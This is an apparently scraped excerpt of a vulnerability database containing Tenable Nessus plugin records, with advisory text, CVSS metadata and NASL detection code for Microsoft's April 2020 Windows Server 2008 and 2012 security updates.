vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550957\nor cumulative update 4550951. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1007)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\");\n # https://support.microsoft.com/en-us/help/4550957/windows-server-2008-update-kb4550957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e700ec83\");\n # https://support.microsoft.com/en-us/help/4550951/windows-server-2008-update-kb4550951\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9a49f43\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550957 or Cumulative Update KB4550951.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550951', '4550957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550951, 4550957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:12:12", "description": "The remote Windows host is missing security update 4550971 or cumulative update 4550917. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550971: Windows Server 2012 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550917.NASL", "href": "https://www.tenable.com/plugins/nessus/135465", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135465);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\"\n );\n script_xref(name:\"MSKB\", value:\"4550971\");\n script_xref(name:\"MSKB\", value:\"4550917\");\n script_xref(name:\"MSFT\", value:\"MS20-4550971\");\n script_xref(name:\"MSFT\", value:\"MS20-4550917\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550971: Windows Server 2012 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550971\nor cumulative update 4550917. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n # https://support.microsoft.com/en-us/help/4550971/windows-server-2012-update-kb4550971\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d8c500e\");\n # https://support.microsoft.com/en-us/help/4550917/windows-server-2012-update-kb4550917\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba6a0797\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550971 or Cumulative Update KB4550917.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550971', '4550917');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550971, 4550917])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": 